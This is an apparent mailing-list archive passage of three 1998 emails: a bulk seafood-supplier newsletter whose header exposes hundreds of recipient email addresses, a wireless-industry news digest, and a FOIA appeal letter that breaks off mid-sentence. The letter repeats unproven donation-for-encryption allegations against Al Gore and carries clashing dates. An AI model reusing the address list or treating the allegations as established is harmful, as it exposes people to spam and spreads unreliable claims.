eximport@idt.net; expac@aol.com; expack@aol.com; export@intl-tradement.com; ex-sfd@bellwouth.net; exshrimp@aol.com; extrapro@procosur.com; extrem@fx.ro; fairlanefd@juno.com; famold@mindspring.com; fao@eastfish.org; fasinfo@fas.usda.gov; fatcrab@steamedcrabs.com; fathoms@funbarbados.com; fazfrmgt2@aol.com; fbcab@mbox.vol.it; fdm@catsnet.com; filip@envirotainer.com; fininc@nbnet.nb.ca; firefuzz@datasync.com; fish.amal@clear.net.nz; fish@fishroute.com; fish@mgh.hb.eunet.de; fish@stavis.com; fish@web-net.com; fishbid@xyz.net; fishdev@aol.com; fisheries@ecology.bio.dfo.ca; fishhouse@pennekamp.com; fishinc@nbnet.nb.ca; fishmaninc@yahoo.com; fishmore@windsor.igs.net; fiskmark@treknet.is; fjdonoso@reuna.cl; fjord@gate.net; flhansen@pro-bolivia.com; fmak@tm.net.my; foodexp@sminter.com.ar; foodpro@voyager.co.nz; fratello@mendazer.com; Freeko@smipc.or.kr; freshfish@worldnet.att.net; friomar@adinet.com.uy; frozen@wanchese.com; fulfish@mail.cosapidata.com.pe; furni@fzu.edu.cn; fwu@deltatrak.com; gadco@iec.egnet.net; gadus@istar.ca; gaintown@ms14.hinet.net; gambie@pop3.concentric.net; gao@public.fz.fj.cn; garments@sietic.qd.sd.cn; garza@lagnetcom.mx; gated-people@merit.edu; gatorstick@aol.com; gdmec@dgup3.gd.cei.gov.cn; genehickman@msn.com; geoperfect@tip.nl; geotech@giasmd01.vsnl.net.in; germst@earthlink.net; ghodges@temptale.com; gilship@gmunro.ca; ginacarvalho@trinidad.net; gipse@node.com.br; gjh@pacific.net.sg; gjlimp@aol.com; gjsmall@worldnet.att.net; gla@glassociates.com; glacier@halcyon.com; glk@idt.net; global.wildlife@gtnet.gov.uk; global1940@aol.com; glynns@freewwweb.com; glynns@smart1.net; gnu@toad.com; gnyba@friko2.onet.pl; gnyba@kki.net.pl; gnyba@polbox.com; goldenstar@chinatrade.net; goodrichho@msn.com; gothamsfd@aol.com; gourmetclb@aol.com; gprobst142@aol.com; grans@gmunro.ca; graphic@lenet.fr; graycen@mindspring.com; g-routes@fox.nstn.ns.ca; gssfd@bellsouth.net; gtc@manufacture.com.tw; gulfexpress@gulfexpress.com; gunjur@aol.com; gwadman@tartannet.ns.ca; gylin@usa.net; gyorke@infoshare.ca; gzgarden@public.guangzhou.gd.cn; gzgmg@public1.guangzhou.gd.cn; hartsell.james.R000@sysco.com; halfbeak@hotmail.com; hallman@law.vill.edu; hansung@t-online.de; harish@giasmd01.vsnl.net.in; hcsp@dlews1.dl.cei.gov.cn; heinrich@indosat.net.id; helgimar@valeik.is; help@leisterpro.com; hendersd@mailgate.net.treas.gov; hernandezb@aol.com; hillsburn@ns.sympatico.ca; hillsburn@ns.sypatico.ca; himsa@himsa.com; hiteccom@giasmd01.vsnl.net.in; hmekran@paknet3.ptc.pk; hmunro@ibm.net; hnfishco@ix.netcom.com; hoxenberg@aol.com; hskaar@skaarint.com; huff@solander.co.nz; hugwill@total.net; hunterexporters@hunterlink.net.au; hunterss@sprynet.com; hwamerica@aol.com; hziq55@public.hzptt.sd.cn; ian@csiseafood.co.nz; ideveau@klis.com; idk@idkconsulting.com; imartin713@aol.com; impexc2000@aol.com; impship@gmunro.ca; incofoods@chilnet.cl; ine@tbd.gov.sg; info@abisnet.com; info@amalmark.co.nz; info@axcessdata.com; info@banxia.com; info@bavariacorp.com; info@blundellseafoods.com; info@ca-seafood.org; info@catalogmall.com; info@citgroup.com.cs; info@clearfreight.com; info@commodityspecialists.com; info@commodityspecialistscompsny.com; info@corp.maf.govt.nz; info@cylinder-slide.com; info@export.nl; info@frozenfish.com; info@fundch.cl; info@handycrab.com; info@harbinger.com; info@henningsen.com; info@hichina.com; info@ilmondo.com; info@infofish.com; info@insuracepros.com; info@liveseafood.com; info@mafi.com; info@meadowswye.com; info@pbb.com; info@pioneer97.co.uk; info@pro-bolivia.com; info@royal-import-export.com; info@sanford.co.nz; info@scanvec.com; info@schema.de; info@sportika.com; info@takari.com; info@tcal.com; info@tradepost-chat.com; info@visshop.com; info@world-trading.com; infoavi@mx.cei.gov.cn; infocom@del2.vsnl.net.in; information@deepseaproductsinc.com; information@intertrade.net; interagr@shadow.net; interdat@silverlink.net; interfoo.dltda001@chilnet.cl; interpex@usa.net; interprenr@aol.com; intlsupport@scanvec.com; isfoss@isholf.is; itc@ispinfo.com; itl@md2.vsnl.net.in; ivanindo@indo.net.id; iwads@wa.net; jablack@indiana.edu; jackch@nbnet.nb.ca; jahern@stavis.com; jahworks@erols.com; jajjr@ibm.net; jamesons@maui.net; janboseafood@hotmail.com; jankajander@hotmail.com; jarrod@pc.jaring.my; jason@solar.mxl.cetys.mx; jaster@ats.com.au; jathomas@northcoast.com; jaworski@gsosun1.gso.uri.edu; jayaar@globalnet.co.uk; jbfoods@zebra.net; jcao@chinatrade.net; jccdyin@asiaonline.net.tw; jcmw@sietic.qd.sd.cn; jdkap@bellsouth.net; jeff@clearfreight.com; jeffd@baaderna.com; jerry@tunacan.com; jetalt@dol.ru; jetson97@aol.com; jf@doris-and-eds.com; jfack@urnerbarry.com; jfsins@ibm.com; jhb@bluemar.co.za; jhoward@nssc.ca; jimbifford@aol.com; jimesal@earthlink.net; jimge@aros.net; jinkwan@hotmail.com; jirza@marinet.com; jkjms@redrose.net; jklose@colomsat.net.co; jkstill@bcbso.com; jluque@mail.udep.edu.pe; jmurr@xyz.net; jobol@acy.digex.net; john@canfisco.com; johnm@intersea-seafood.com; johnrube@aol.com; josie491@ms16.hinet.net; jpabitbol@groupe-jp-abitbol.com; jpvdwalt@iafrica.com.na; jrbadham@mts.net; jsbigley@efish.com; jsimpson@sinmark.com; jt@star-asia.com; jttheron@mweb.co.za; jumainte@emirates.net.ae; jun@iastate.edu; jwebb@usabalone.com; kadr@videotron.ca; kanpa@cyber.net.pk; karinacb@argenet.com.ar; kathie@mail.ioma.com; kaventerprises@rocketmail.com; kazykuro@aol.com; kbar1@tgn.net; kbwizzard@aol.com; kdahlmann@bharchetype.com; keywest@gate.net; keywest876@aol.com; khabbaz@cyberia.net.lb; kianghua@loxinfo.co.th; kim0233@maoyi.co.kr; kimg@sladegorton.com; kirk@sala.net; klarsen1@compuserve.com; klitz@aol.com; km@star-asia.com; kodiak@kodiak.org; kpeters@wave.co.nz; ksamy@pppindia.com; kstone@interpath.com; kvy@hkabc.net; kvy@hkstar.com; kvy@pworld.net.ph; kwolfe@intellistar.net; lampert@fortnet.org; lawrence@arrowac-merco.com; lbaugh@freeyellow.com; leadway@ibm.net; lechagua@ctcreuna.cl; lemmi@datacomm.ch; lgt@mweb.co.za; liform2@salus.zp.ua; lili@statics.com.ar; lincoln@cyberg.it; listmanager@hookup.net; liverock@tbsaltwater.com; ljchin@tiac.net; ljox@earthlink.net; lk@star-asia.com; lk-cabling@bnet.at; Lm.sales@laitram.com; lmartin713@aol.com; lobster@peionline.com; lockcom@hlc.com; lollo@lollo.com; longwharfcrab@worldnet.att.net; lossie@wintermute.co.uk; l-rtudel@gmunro.ca; lseafood@aol.com; ludshrimp@aol.com; lyonspk@biruni.erum.com.pk; m1699@mcia.com; maasilks@blr.vsnl.net.in; macpac@mnsi.net; madhavwp@gatewaytoindia.com; mail@americanfood.com; mail@import-export-training.com; mail@vanco.net; manager@brazilnetwork.com; manager@internationalist.com; marctrad@icanect.net; mareusz@post5.ele.dk; marine@xiamen.gb.co.cn; marketing@oceangarden.com; Marketing@pacseafood.com; martinez@colombianpost.com; masi@gmunro.ca; mateusz@post5.tele.dk; matthew.renton@virgin.net; maurop@sistel.it; mazzico@aol.com; mbanda@deltasys.co.zw; mbox1as@mbox3.signet.com.sg; mcclmatt@nicoh.com; mcrandy@oro.net; mczm@state.ma.us; m-du@gmunro.ca; medfish@midcoast.com; mellco@tradezone.com; mendipez@readysoft.es; mermaidtrevor@btinternet.com; metal@vldbros.com; mfi@super.net.pk; miasa@statics.com.ar; michael.charalambous@british-airways.com; midatl@dmv.com; midlink@emirates.net.ae; midlun@midlun.is; mie@projekti.cs.jyu.fi; mikes.pe@aol.com; milton@nicanet.nicanet.com.ni; milton@nicanet.nicanet.com.ni; mitco@cris.com; mjw@chaser.co.uk; mlc@uncc.edu; mloder1079@aol.com; m-naraj@gmunro.ca; moana@xtra.co.nz; moietc@china-times.com; morsey@clinic.net; mrfish1@gte.net; mrussell@rmgcal.com; msardine@mint.net; mt2c@highcountry.net; mtadler@stavis.com; mtlfish@msn.com; MOUNTAIN HARBOUR DIST. INC.; multinet@homeindia.com; mwoods@wesco-hln.com; najinlu@public.yc.nx.cn; nancy@divcom.com; nason01@unitel.co; nason01@unitel.co.kr; naturecst@aol.com; nazcahf@mail.cosapidata.com.pe; ncognitotx@aol.com; neonet@nlr.nl; nepfishnj@aol.com; nestor@easynet.fr; network@giasmd01.vsnl.net.in; newage@trade-trade.com; newsroom@s-t.com; nexter@camerdata.es; ng@public.nc.jx.cn; nigelstevens@amaltal.co.nz; nilefish@sukumanet.com; nino@ionino.com; nippon1@entelchile.net; niva@telecom.net.et; njm@sealord.co.nz; nlov@west.net; nmoore@nfi.org; nobi@arrowac-merco.com; noel.turner@turner.co.nz; noelwh@aol.com; nopalax@internet.dk; noplax@internet.dk; notifyme@thaitrading.com; npesrl@tin.it; nsdp@bumi.net.id; nusa@indobiz.com; oancarola@sit.com.ar; oarpanfish@msn.com; oasis-ie@yahoo.com; oceansur@argenet.com.ar; ocn@usa.net; ocnblu@worldnet.att.net; office@nfi.org; office@starfish.no; oicrh@public.sta.net.cn; oks@nwlink.com; ole.christian@tangtare.no; omartins@auracom.com; omblus@cie.ut.ee; opport@magi.com; osc29@idt.net; otnot@alaska.net; owner-fisheries@biome.bio.ns.ca; owner-gated-people@merit.edu; owner-saluqi-h@plaidworks.com; owner-ssl-users@mincom.com; pacific@ptalaska; pacmarltda@chilnet.cl; pacseaf@gte.net; pall@cs.ait.ac.th; palmar@bakki.is; paul@dimareseafoods.com; pearlmar@total.net; pedrogm@arrakis.es; pesca@md3.vsnl.net.in; pescainde@usa.net; philipdh@dantran.com; phillip.west@exco.co.uk; phillip@intersea-seafood.com; philrt10@aol.com; phoenix@ncll.com; pinefurn@countrycraft.co.za; piscicom@mdearn.cri.md; pkcs-tng@rsa.com; pmc@idola.net.id; pmcfu1@tp.silkera.net; pngroup@ksc.th.com; polonia@odyssey.on.ca; portcan@aol.com; ported@mc.net; post@wiex.com; postmaster@exegesis.co.uk; postmaster@plaidworkd.com; pr@dwtc.com; prideseafood@westal.net; priscicom@mdearn.cri.md; procheck@earthlink.net; project@chinatrade.net; promar@swbell.net; promart@loxinfo.co.th; promosys@flash.net; proyecta@netline.cl; ps@star-asia.com; psandvi@ibm.com; pubit@mo.nettuno.it; qiao898@hotmail.com; qsy@hotmail.com; quality@lombardis.com; quirtt@schneider.com; r0mtex@airmail.net; raga@md3.vsnl.net.in; raja@md2.vsnl.net.in; rajcal@giascl01.vsnl.net.in; rajudyog@md2.vsnl.net.in; registration@spch.com; relegon@aol.com; reneg@total.net; renjith-r@hotmail.com; resumes@indiaprimer.com; revboard-sec@pch.gc.ca; reza@ad1.vsnl.net.in; rfay@flfreezer.com; rfb@wco.com; rhayman179@aol.com; rherman@gnn.com; rhi@regal-hotels.com; rick@www.heyworth.com; rickg@ari1.com; riturralde@email.msn.com; rlandy@stavis.com; rlevy@stavis.com; rmarkley@southshoresins.com; rmeasley@usa.net; rmfl@xtra.co.nz; rmg@rmgcal.com; rmore@cri.com; robert.blake@marcodirect.co.nz; robertvilla@msn.com; rodan@vera.net; rofish@onxynet.co.uk; romining@netverk.com.ar; root@baires.com; rstavis@stavis.com; rswalaa@rite.com; rtb@hkstar.com; rudani@mail.sen.com.ph; russell@peninsulaseafoods.com; ryan@orcabayfoods.com; ryuan@deltatrak.com; s.h.surury@technologist.com; s621630@aix2.uottawa.ca; sadao@clearfreight.com; sailor@cam.org; salaud@compuserve.com; sales@abisnet.com; sales@atlanticseacove.com; sales@bcsockeye.com; sales@blazessi.com; sales@bqe.com; sales@dimarseafoods.com; sales@dkenterprises.com; sales@globalexporters.net; sales@ietglobal.com; sales@pro-bolivia.com; sales@pwseafood.com; sales@shoretodoor.com; sales@united-fisheries.co.nz; sales@vistafoods.com; sales@wrightlobster.com; salesmgt@simu.co.nz; salman@dhaka.agni.com; salmon@mint.net; salmon@norse-crown-seafood.dk; salmon@schooner.org; salqui-h-info@plaidworks.com; saltman@stavis.com; samcney@emeraldcoast.com; sameer@c2.net; sanders@inkweb.com;  textilesei@chaozhou.com; tfbayly@marcon.co.nz; tgilship@gmunro.ca; thaiccs@mozart.inet.co.th; thammerman@aol.com; thlgrp@pacific.net.sg; threshold@nisa.net; ticofish@sol.racsa.co.cr; tim@exegesis.co.uk; timpship@gmunro.ca; tims@linjk.freedom.com; tjffarms@aol.com; tkromano@email.msn.com; tkunzer@aol.com; tlspence@w3pr.com; tmarks@kendall.mdcc.edu; tmarr@downtime.com; tnrcfood@mbnet.mb.ca; tom@iu.net; tony@arrow-merco.com; top@manufacture.com.tw; topseafood@worldnet.att.net; towndock@pop3.ids.net; tpkorea@kotis.net; tpsftcc@public.sta.net.cn; tptelisr@netvision.net.il; trade@blackworld.com; trade@ch-non-food.com; trade@opportun.kc3ltd.co.uk; tradexsfds@aol.com; transdata@webworldinc.com; travel@travel.com.hk; trisport@iml-net.com.na; trueco@dhivehinet.net.mv; tscorp@bom3.vsnl.net.in; tsfi@thongsiek.com.sg; tsmith@catgraph.com; tuna@ralboray.com; tuna@seanet.com; turbos@turbosales.com; t-xanth@gmunro.ca; u.s.a.-Inoel180471@aol.com; ufi@gte.net; unibr@unitel.co.kr; unirel@pace.edu; unisee@aol.com; unitedimport@att.com; university@geographix.com; uscodex@aol.com; vacpacsf@mozcom.com; valpado@hotmail.com; vcilp@lumen.vcilp.ortg; vela@wave.co.nz; vfuks@jaguar.ir.miami.edu; vhg04@emirates.net.ae; victian@shell.tjvan.com.cn; victian@shell.tjvan.net.cn; victorray@aol.com; vietnam.order@cgtd.com; vipul@pobox.com; virginia@clearfreight.com; vishop@freemail.nl; visshop@dsv.nl; visshop@freemail.nl; vixens@ptialaska.net; vr4u@ksc8.th.com; vshlexps@hotmail.com; waag@email.msn.com; waltraut@arrowac-merco.com; wangh@mail.zlnet.co.cn; wangrap@public.ytptt.sd.cn; warcher@nafta.net; waynes@connet80.com; web@acdev.com; web@xmission.com; webhost@seafoodleader.com; webmaster@dragoncity.com.sg; webmaster@goldq.com; web-requests@www.aphis.usda.gov; wenqx@sd.cei.go.cn; westlake@globalvision.net; whigs@del2.vsnl.net.in; whm.fmii@auracom.com; wingtop@algonet.se; wiwate@cementhai.co.th; woceanus@aol.com; wolfmarine@aol.com; wolftanks@aol.com; wpwoods@aol.com; wrefhann@ihug.co.nz; wschin@ascl.com; wservice@simcoe.igs.net; wsking@ibm.net; wtcor@gdi.net; www.hunterss@sprynet.com; wsl@cerebalaw.com; www@scanvec.com; wytree@telekbird.com.cn; xcdc@xpublic.fz.fj.cn; xw@tdl-info.net; xzsawqe@emirates.net.ae; yangdong@public.jn.sd.cn; yesintl@flmarinenet.com; ylil@aol.com; young66@aol.com; ytzx@public.rzptt.sd.cn; zafir@home.com; zakat97@aol.com; John Arnold; zhangxn@hichina.com; zhwindow@pub.zhuai.gd.cn; ziplar@writeme.com; zoro@mpsnet.com.mx; zsy@pub1.fz.fj.cn; ztiec@public.hz.zj.cn; ztiec@ztiec.com; zxd@club.pages.com.cn; zxd1098@bigfoot.com; zxw@public.hz.zj.cn; bkmco@hotmail.com; callisfd@hotmail.com; shuler@computextos.com.pe; ecssfd@bellsouth.net; gamvie@pop3.concentric.net; expork12@ecua.net.ec; milton@nicnet.com.ni; itc@khi.compol.com; silvabue@totalnet.com.ar; active.83@netvision.net.il; Calembo@gnet.tn; ng@dcdmc.intnet.mu; abs@tassie.net.au; camtas@mox.com.au; freofish@icenet.com.au; demcos@ozemail.com.au; lee@sia.net.au; woodfish@pronet.com.au; sumnersf@oe.net.au; westmanp@acr.net.au; yoshida-H@syd.marubeni.co.jp; hirakitsukamoto@austrade.gov.au; lobsterdoc@aol.com; sjr@bb.rc.vix.com; sjoyce@thai.com; skip@futureone.com; cmsacv@debtel.com.mx
Subject: 	The Catch of the Week

                               
 

             The Catch of the Week
         SEAFOOD INDUSTRY INFORMATION SERVICE
 
Hello, welcome to the "NEW" newsletter, now available via e-mail  from SEA-EX.
 
As you know, Sea-Ex is an Australian company which provides a service connecting buyer to seller - DIRECT.  We are now expanding our newsletter to cover e-mail. 

This service provides you with an opportunity to promote and expose your company and products to numerous contacts in the seafood industry both in Australia and abroad, weekly.  It is a simple, yet effective way to promote yourself - Direct to your industry.  

To place your FREE classified see below.

                      THIS IS WEEK ONE (1) OF A FREE FOUR (4)  WEEK TRIAL.
We would also welcome comments you may have regarding this newsletter, and we are also open to any suggestions to improve this service.
 
1.  Uptop Fisheries Pty Ltd                AUSTRALIA                                        OPEN MARKET
Goods supplied:  Sharkfins (Wet), Shark cartiledge (frozen), Shark & mackeral fillets & trunks (frozen)
Contact Jenny Davies  uptop@iinet.net.au
 
 
2.  Adelaide Bay Seafoods Pty Ltd               AUSTRALIA                           OPEN MARKET 
Goods supplied:  Live and frozen greenlip and blacklip abalone.
Contact:  Loraine Kossmann    abs@tassie.net.au
 
3.  Cameron of Tasmania Pty Ltd                   AUSTRALIA                         OPEN MARKET               
 Goods supplied:  Live pacific oysters, frozen half shell Pacific oysters, Golden Pacific Oysters.
Contact:  Michael Cameron or Edgar Burtschner        camtas@mox.com.au
 
4.  Oakfair International                                     AUSTRALIA                         OPEN MARKET
Goods supplied:  sardines (WR & Fillets), Cod (H&G and fillets), Alaskan Pollock (H&G and Fillets), Scallops, Squid, Octopus, Sockeye Salmon, Pink Salmon, Chinook Salmon, Chum Salmon, Coho Salmon, Flounder.
Contact:  Charlie   oakfair@icenet.com.au
 
5.  Pacific Business Pty Ltd                              AUSTRALIA                        OPEN MARKET
 Goods supplied:  Representative of "Golden Emperor" canned Abalone, exporter of "Pacific" canned Abalone, Frozen, Live, Cooked Abalone.  Frozen Scallops, fish and seafood.
Contact:  Stephen Lee   lee@sia.net.au
 
6.  Wood Fisheries Pty Ltd                                AUSTRALIA                       OPEN MARKET
Goods supplied:  Stout whiting, yellow-tail scad, tuna, finfish and deepwater finfish.
Contact:  A.K. (Sandy) Wood-Meredith   woodfish@pronet.com.au
 
7.  Fremantle Fish Farms                                  AUSTRALIA                       AUSTRALIA ONLY
Goods supplied:  Sardines (WR & Fillets), Alaskan Cod (H&G and fillets) Smoked Russian Sockeye Salmon.
Contact:  Steve Wilkinson    freofish@icenet.com.au
 
8.  Demcos Seafoods Pty Ltd          AUSTRALIA                  SYDNEY     AUSTRALIA ONLY
Restaurants a speciality. Providors of Finer Seafood.   Seasonal fresh produce of TOP QUALITY.  
Inquiries, contact Con or James   demcos@ozemail.com.au 
 
9.  Moana Pacific Fisheries Ltd                   NEW ZEALAND                    OPEN MARKET
Goods supplied:  FROZEN:  Alfonsino, barracoutta, cardinal, flake, flounder, New Zealand sole, lemon sole, orange roughy, monkfish, rubyfish, scampi, snapper, gemfish, hoki fillets.  FRESH:  Bluenose, snapper, tarakihi, orange roughy, live greenlip mussels, flounders, gurnard, moonfish, john dory, groper/bass, trevally, broadbill swordfish.
Contact:  Rachel Joughin or Bruce Bird    moana@xtra.co.nz 
 
10.  Great White Holdings Pty Ltd                 AUSTRALIA                       OPEN MARKET
Goods supplied:  Live mud crabs, live pippies, live Pacific oysters.
Contact Nick or Stan    mudcrabs@zed.org 
 
11.  Global Seafood Fisheries                        AUSTRALIA                       OPEN MARKET
 
Goods supplied:  Coral trout (frozen raw), Tropical lobster tails, mullet roe, scallop meat - roe off.  Fresh fish.
                          Frozen Prawns:  Banana, Endeavour, King and Tiger.
Contact:  Neal Harris    glosea@bigpond.com
 
12.  Sumner Seafood Export Australia                                                    OPEN MARKET
Goods supplied:  LIVE coral trout, LIVE Lobster.  LIVE spanner and mud crabs.  Frozen and Chilled reef fish and estuary fish and frozen Queensland scallops.
Contact:   David Hoac     sumnersf@oe.net.au 
 
13.  P & E Foods Inc               Hawaii USA                                               OPEN MARKET
Goods Supplied:  Frozen seafood, pork, meat, poultry.  Fish, shellfish, lobster, crab.
Contact:  Stephen S.C.Lee        Telephone:  + 1 808 839 9094           Fax:  + 1 808 833 5182
 
14.  Pacific Marine Farms 1996 Ltd          NEW ZEALAND                 OPEN MARKET
Goods supplied:  1/2 shell oysters - chilled and frozen
Contact:  Vince Syddall           Telephone:  + 64 7 866 8564             Fax:  + 64 7 866 8753 
 
15.  Clyde River Oyster Company           AUSTRALIA                        AUSTRALIA ONLY
Goods supplied:  Clyde River (Australia) Oysters.
Contact:    Mr Bill Suter  suters@acr.net.au         or       Mr Paul Westman     westmanp@acr.net.au 

 
                              --------------------------oooOOOooo-------------------------------

Above are just some of our suppliers listed in our Directories of Seafood Suppliers.  For more information, see our website at http://www.big.net.au/~seaex.   When contacting these people, be sure to mention SEA-EX!!!

If you would like any further information regarding the above companies, please e-mail us your enquiry to seaex@big.net.au
 LIST YOUR "CLASSIFIED"  HERE
Here is a place to list your "classifieds" regarding your industry.  Buy, sell, offer, wanted, promote etc.
To list a classified please click on : seaex@big.net.au 
Remember to include your contact details, so that people can contact you!

To stop receiving this newsletter,  please email us at seaex@big.net.au and in the subject line please put "No News to:  (your e-mail address)"
 
 
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
AFTER YOUR FREE TRIAL, IF YOU WOULD LIKE TO CONTINUE RECEIVING THIS SERVICE COSTS WILL BE AS FOLLOWS:

1 MONTH SUBSCRIPTION     ......................         AUD$30.00
3 MONTH SUBSCRIPTION     .....................                 AUD$75.00 
6 MONTH SUBSCRIPTION     ......................         AUD$140.00 
12 MONTH SUBSCRIPTION   ......................                AUD$250.00 
 
PAYMENT VIA CHECK, MONEY ORDER, BANKCARD, MASTERCARD OR VISA.
Please e-mail with a "request for Subscription Form" in the subject header, and provide your fax or postal details. 
 
Disclaimer
All classifieds are submitted by individual companies.  While every care has been taken in compiling this newletter, Sea-Ex will not be held responsible for any error or omissions.  The advertising in this newsletter is the sole responsibility of the companies who place the classifieds and Sea-Ex will not be held liable in any way for any loss or injury whatsoever, in business dealings with these companies. 
 

 

<<File: ATT00000.htm>><<File: ATT00001.jpg>><<File: ATT00002.jpg>>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Wed, 5 Aug 1998 11:48:36 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - August 5, 1998
Message-ID: <199808051819.NAA05967@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain




==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

*** Please Note: We are pleased to provide a text-only 
version of the CTIA Daily News from WOW-COM.
The text only version is contained in this e-mail. ***

Get the latest information on virtually all aspects 
of Number Portability.

Attend the CTIA-sponsored Number Portability Forum 
on August 18 in Washington, D.C.

For further information and registration, please contact 
Carolyn Williamson at 202-736-3224 or e-mail:
Cwilliamson@ctia.org
===========================================

 

===========================================
Text-Only Version of today's news sponsored by Nokia
===========================================

CTIA Daily News from WOW-COM - August 5, 1998

Wireless Industry, Local Governments Announce Plan to Resolve Antenna Siting Disputes -- Three wireless industry trade associations, along with an advisory group representing local governments, have agreed to a speedy dispute-resolution process that, they hope, will resolve disagreements that arise when local governments impose moratoriums on construction of new antenna sites.
http://www.wow-com.com/results/professional/news/frameindex.cfm?articleid=3085
http://www.washingtonpost.com/wp-srv/WPlate/1998-08/05/130l-080598-idx.html


House Commerce Committee Approves Wireless 911 Legislation -- The purpose of the legislation approved by the Committee is "to encourage and facilitate the prompt deployment throughout the United States of a seamless, ubiquitous, and reliable end-to-end infrastructure for communications, including wireless communications, to meet the Nation's public safety and other communications needs."
http://www.wow-com.com/results/professional/news/frameindex.cfm?articleid=3086


Attorney General Asks Congress Not to Extend CALEA Compliance Date -- The U.S. Attorney General stated that moving the compliance date "two full years would permit substantially more telephone equipment to be designed and deployed without regard for the public safety concerns that CALEA was designed to protect." The industry argues that an extension is necessary.
http://www.wow-com.com/results/professional/news/frameindex.cfm?articleid=3087


Motorola Offers Investment Analysts Few Specifics on Future Performance -- In an August 4 meeting with financial analysts, Motorola executives offered few concrete numbers or projections, but said that the digital phone business was a huge priority.
http://www.techserver.com/newsroom/ntn/info/080598/info22_22832_noframes.html
http://chicagotribune.com/business/businessnews/article/0,1051,ART-12809,00.html


Foes Hammer Universal Service E-Rate at Congressional Hearing -- Powerful members of Congress, long distance companies, consumer advocates, and even FCC commissioner Harold Furchtgott-Roth argue that the e-rate is an unfair tax that the FCC created without proper authority.
http://www.news.com/News/Item/0,4,24923,00.html?owv
http://www.news.com/News/Item/0,4,24924,00.html?owv


Powertel Surpasses 200,000 Wireless PCS Subscribers -- The new wireless carrier says its now has the largest contiguous digital wireless coverage area in the southeast.
http://biz.yahoo.com/bw/980805/powertel_1.html


Nextel Expected to Announce Rural Partnership Pact -- Nextel has said the partnership would cover about 15 percent of the U.S. population. It would also allow it to broaden its geographic coverage into rural areas faster than it would be able to do on its own.
http://biz.yahoo.com/finance/980804/nextel_s_r_1.html


WIRELESS SECURITY Workshop & Expo Focuses on New Threats to Wireless Systems -- The conference will focus on a broader range of wireless security issues, including network vulnerability, authentication deployment, subscription fraud and international roaming fraud.
http://www.wow-com.com/results/professional/news/frameindex.cfm?articleid=3091


First Wireless Phone with Color Screen Now Available from Omnipoint -- Omnipoint Communications now offers the Siemens S12 GSM handset, which, the company says, is the world's first wireless phone with a three-color (red, blue and green), five-line display.
http://biz.yahoo.com/prnews/980805/nj_omnipoi_1.html


China's Mobile Phone User Population Tops 18 Million -- It took a decade for mobile phone users to reach 18 million compared with 100 years for the country to have 10 million private telephones, the Xinhua news agency said.
http://biz.yahoo.com/finance/980803/china_s_mo_1.html


COMSAT Corporation Sues Three Former Employees -- The lawsuit, against three former employees of COMSAT Mobile Communications, alleges the former employees misappropriated confidential, sensitive and proprietary business information, and purposefully and systematically destroyed computer files prior to resigning from COMSAT.
http://biz.yahoo.com/prnews/980804/md_comsat__1.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Wed, 5 Aug 1998 13:28:42 -0700 (PDT)
To: george breznay <senatorlott@lott.senate.gov
Subject: FOIA appeal
Message-ID: <35C8BE3D.629B@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Wednesday 8/5/98 1:50 PM

George B. Breznay, Director
Office of Hearings and Appeals
Department of Energy
Washington, DC 20585

Dear Director Breznay:

Purpose of this letter is to ask you to properly process a Freedom of
Information Act
(FOIA) appeal.

I attach a copy of my Tuesday February 17, 1999 15:11 FOIA. letter to
Elva Barfield.

Albuquerque  Journal w 8/5/98 reports

  FBI Director Again Calls for Fund-Raising Probe

  By Kevin Galvin
  The Associated Press

  WASHINGTON - The FBI director told lawmakers Tuesday an independent
  counsel should be named to investigate Democratic fund raising in
  part because President Clinton and Vice President Al Gore are
  under scrutiny. ...

June 11, 1998 I received a letter from Tomas O. Mann,  Deputy Director,
Office of Hearings
Hearing and Appeals.

Mann wrote

  It is unclear from your correspondence whether you are in fact
appealing Ms. Barfield's March 30
  determination at this time.  If you wish to appeal that determination,
please inform this Office 
  as soon as possible by stating your intention in writing, either by
mail to George B. Breznay,     Director, Office Office of Hearings and
Appeals, U.S. Department of Energy, Washington,  D.C.     20585-0107, or
by e-mail to George.Breznay@hq.doe.gov.

I comply with Mann's request.

Since the contents of the documents sought in my FOIA may shed light on
possible wrongdoing by
VP Al Gore, I ask that you process this appeal within the time limits
specified by law.

  An agency is required to make a decision on an appeal
  within 20 days (excluding Saturdays, Sundays, and legal
  holidays). It is possible for an agency to extend the time
  limits by an additional 10 days.

Sincerely,



William H. Payne
13015 Calle de Sandias NE
Albuquerque, NM 87111

http://www.us.net/softwar/


Tuesday February 17, 1999 15:11

e-mail and mail

Ms. Elva Barfield
Freedom of Information Office
U. S. Department of Energy
Albuquerque Operations Office/OIEA
POB 5400
Albuquerque, NM 87185-5400
EBARFIELD@DOEAL.GOV

Dear Ms. Barfield:

VP Al Gore is in the crypto business.

  Information SuperSpyWay 
  Al Gore Approved
  Encryption for China
  in Return for
  Campaign Donations
  by Charles R. Smith

Portions of the above document posted on Internet at 
http://www.us.net/softwar/ and  http://www.aci.net/kalliste/ 
states

1.	Gore charged with encryption policy according to PDD-5 and 
        PRD-27 on April 16, 1993. 

2.	Government officials represent themselves on Al Gore's behalf for 
	RSA patent purchase negotiations in Feb. 1994. 
3.	RSA chairman Bidzos meets with Chinese officials at the same 
        time as Ron Brown in Oct. 1995. 

4.	RSA Chairman Bidzos enters into merger negotiations with Security 
	Dynamics, a company backed by Sanford Robertson, in Nov. 1995. 

5.	VP Gore calls Sanford Robertson from the White House for a 
        donation in Nov. 1995. 

6.	Robertson delivers $100,000 donation ($80,000 soft - $20,000 
	directly into the Clinton/Gore campaign) in Jan. 1996. 
7.	RSA signs deal with China in Feb. 1996. The administration 
	previously prosecuted similar deals but this time does nothing. 
8.	Justice Dept. approves RSA merger with Security Dynamics in 
	April 1996 for $280 million dollars, netting Sanford Robertson's 
	company a cool $2 million just to write the deal. 

In 1991 I was in involved with Sandia National Laboratories
Comprehensive Test Ban Treaty seismic data authenticator.

At that time Sandia director Tommy A Sellers had assumed 
